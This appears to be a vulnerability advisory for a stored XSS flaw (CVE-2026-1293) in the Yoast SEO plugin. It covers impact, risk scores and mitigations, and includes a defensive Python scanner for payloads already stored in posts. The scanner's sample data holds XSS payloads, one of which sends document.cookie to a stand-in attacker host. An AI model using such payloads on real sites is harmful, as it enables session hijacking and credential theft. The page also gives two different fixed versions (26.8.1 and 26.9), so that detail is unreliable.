Platform
wordpress
Component
wordpress-seo
Fixed in
26.8.1
CVE-2026-1293 is a Stored Cross-Site Scripting (XSS) vulnerability in the Yoast SEO plugin for WordPress. An authenticated attacker with Contributor-level access or higher can inject script through the plugin's yoast-schema block attribute; the payload is saved with the post and executes in the browser of any user who later loads the affected page. The vulnerability affects versions 0.0.0 through 26.8, and a patch is available in version 26.9.
Because the script runs in the victim's browser session on a trusted site, the outcomes are those of any stored XSS: session hijacking, redirection to phishing pages, defacement, or theft of credentials and personal data. The realistic target is usually a higher-privileged user: Contributors cannot publish, so the payload typically fires when an Editor or Administrator previews or reviews the submitted post, and a hijacked administrator session amounts to control of the site; once the post is published, every visitor is exposed. The impact is larger on sites that handle e-commerce or other sensitive user data. Since the payload is stored, it keeps executing for every viewer until the content is cleaned up, and upgrading the plugin stops new injections but does not remove content already in the database.
CVE-2026-1293 was published on February 6, 2026. Its severity is currently assessed as Medium. There are no known public exploits or active campaigns targeting this vulnerability at the time of writing, and it is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is 0.04% (12th percentile), consistent with the absence of public exploits, so the probability of exploitation is currently considered low. Treat that as a snapshot rather than a reason to defer the upgrade: a stored XSS reachable from a low-privilege account becomes easy to use once a proof of concept circulates.
Exploit status
EPSS
0.04% (12th percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2026-1293 is to upgrade the Yoast SEO plugin to version 26.9 or later as soon as possible. If the upgrade has to wait for compatibility testing, reduce exposure in the meantime: sanitize and escape the values stored in the yoast-schema block attribute (strip HTML tags and script-capable URIs on save, or escape them on output), restrict post creation and editing to accounts you trust, since Contributor is the minimum role needed to plant the payload, and put a Web Application Firewall rule in front of the site to block common XSS payloads in post submissions. None of these replaces the patch. Watch web-server and REST API access logs for post saves that carry the yoast-schema block from unexpected accounts, and review existing post content for payloads that may already be stored, because the upgrade does not retroactively clean the database. Keep every role's privileges at the minimum it actually needs.
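As a concrete way to do the content review mentioned above, here is an added example (not code from this page, from Yoast, or from WordPress) that parses Gutenberg block delimiters out of post_content, decodes each block's JSON attributes, and flags attribute strings that carry script-capable markup. It assumes the vulnerable block is registered under Yoast's block namespace (the `yoast` match in TARGET_BLOCK_RE is an assumption, as is the `yoast/schema-block` name used in the constructed sample posts), and the indicator patterns are a starting list rather than a complete XSS grammar.

```python
import json
import re

# Gutenberg stores block attributes as JSON inside the block's opening HTML
# comment: <!-- wp:namespace/name {"attr":"value"} --> ... <!-- /wp:namespace/name -->
# or, for blocks without inner content, the self-closing form <!-- wp:name {...} /-->.
BLOCK_RE = re.compile(
    r"<!--\s*wp:(?P<name>[a-z][a-z0-9-]*(?:/[a-z][a-z0-9-]*)?)"
    r"(?:\s+(?P<attrs>\{.*?\}))?\s*/?-->",
    re.DOTALL,
)

# Assumption: the vulnerable block lives in Yoast's namespace. Narrow this to the
# exact block name once you have confirmed it in your installed version.
TARGET_BLOCK_RE = re.compile(r"yoast", re.IGNORECASE)

# Script-capable content that has no business inside a schema attribute.
# Each entry is (label, pattern); the first label that matches a string is reported.
XSS_INDICATORS = (
    ("script-tag", re.compile(r"<\s*script\b", re.IGNORECASE)),
    ("iframe-or-object", re.compile(r"<\s*(iframe|object|embed)\b", re.IGNORECASE)),
    ("svg-tag", re.compile(r"<\s*svg\b", re.IGNORECASE)),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.IGNORECASE)),
    ("data-html-uri", re.compile(r"data\s*:\s*text/html", re.IGNORECASE)),
)


def parse_blocks(content):
    """Return [(block_name, attrs_or_None, raw_attrs)] for every block opener in post_content."""
    blocks = []
    for m in BLOCK_RE.finditer(content):
        raw = m.group("attrs")
        attrs = None
        if raw is not None:
            try:
                # json.loads also turns Gutenberg's \u003c / \u003e escapes back into < and >,
                # so the indicator patterns must run on the decoded value, not the raw comment.
                attrs = json.loads(raw)
            except json.JSONDecodeError:
                attrs = None
        blocks.append((m.group("name"), attrs, raw))
    return blocks


def iter_strings(value, path=""):
    """Yield (dotted_path, string) for every string nested anywhere in a JSON value."""
    if isinstance(value, str):
        yield path, value
    elif isinstance(value, dict):
        for key, item in value.items():
            yield from iter_strings(item, f"{path}.{key}" if path else key)
    elif isinstance(value, list):
        for idx, item in enumerate(value):
            yield from iter_strings(item, f"{path}[{idx}]")


def scan_post(post_id, content, block_re=TARGET_BLOCK_RE):
    """Flag attribute strings in matching blocks that contain script-capable content."""
    findings = []
    for name, attrs, raw in parse_blocks(content):
        if not block_re.search(name) or raw is None:
            continue
        if attrs is None:
            # Attributes that do not parse deserve a look too: the editor never writes these.
            findings.append({"post_id": post_id, "block": name, "attribute": None,
                             "indicator": "unparseable-attrs", "sample": raw[:80]})
            continue
        for path, text in iter_strings(attrs):
            for label, pattern in XSS_INDICATORS:
                if pattern.search(text):
                    findings.append({"post_id": post_id, "block": name, "attribute": path,
                                     "indicator": label, "sample": text[:80]})
                    break
    return findings


def scan_posts(posts):
    """posts: {post_id: post_content}. Returns all findings ordered by post id."""
    findings = []
    for post_id in sorted(posts):
        findings.extend(scan_post(post_id, posts[post_id]))
    return findings


# Constructed sample content (not real site data): one clean post and two posts
# carrying payloads in the block's JSON attributes, stored the way Gutenberg
# serialises them (angle brackets as \u003c / \u003e).
SAMPLE_POSTS = {
    101: (
        "<!-- wp:paragraph -->\n<p>Hello world</p>\n<!-- /wp:paragraph -->\n"
        '<!-- wp:yoast/schema-block {"title":"Our FAQ","url":"https://example.test/faq"} /-->'
    ),
    102: (
        r'<!-- wp:yoast/schema-block {"title":"\u003cimg src=x onerror=alert(document.cookie)\u003e",'
        r'"items":[{"name":"q1","answer":"safe"}]} /-->'
    ),
    103: (
        r'<!-- wp:yoast/schema-block {"title":"Click","items":[{"name":"q1",'
        r'"answer":"\u003ca href=\"javascript:fetch(\u0027//attacker.test/?c=\u0027+document.cookie)\"\u003ehere\u003c/a\u003e"}]} /-->'
    ),
}


if __name__ == "__main__":
    for f in scan_posts(SAMPLE_POSTS):
        print(f"post {f['post_id']}: {f['block']} attr={f['attribute']} [{f['indicator']}] {f['sample']!r}")
```

Feed it real content exported from the site (for example a query for ID and post_content against wp_posts, or WP-CLI's `wp post list --format=json` with post_content among the requested fields) and review every hit by hand. The patterns are deliberately simple and can be evaded by encoding tricks, so treat the scanner as a triage aid for finding already-stored payloads, not as proof that none exist.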
Update to version 26.9 or a newer patched version.
CVE-2026-1293 is a Stored Cross-Site Scripting (XSS) vulnerability in the Yoast SEO WordPress plugin, allowing authenticated attackers to inject malicious scripts via the yoast-schema block attribute, affecting versions 0.0.0–26.8.
You are affected if you run Yoast SEO version 26.8 or earlier (any release from 0.0.0 through 26.8) and have users with Contributor access or higher.
Upgrade the Yoast SEO plugin to version 26.9 or later. As a temporary workaround, sanitize and escape the values stored in the yoast-schema block attribute and restrict who can create or edit posts until the upgrade is in place.
Currently, there are no known public exploits or active campaigns targeting CVE-2026-1293.
Refer to the official Yoast SEO website and WordPress security announcements for the latest advisory regarding CVE-2026-1293.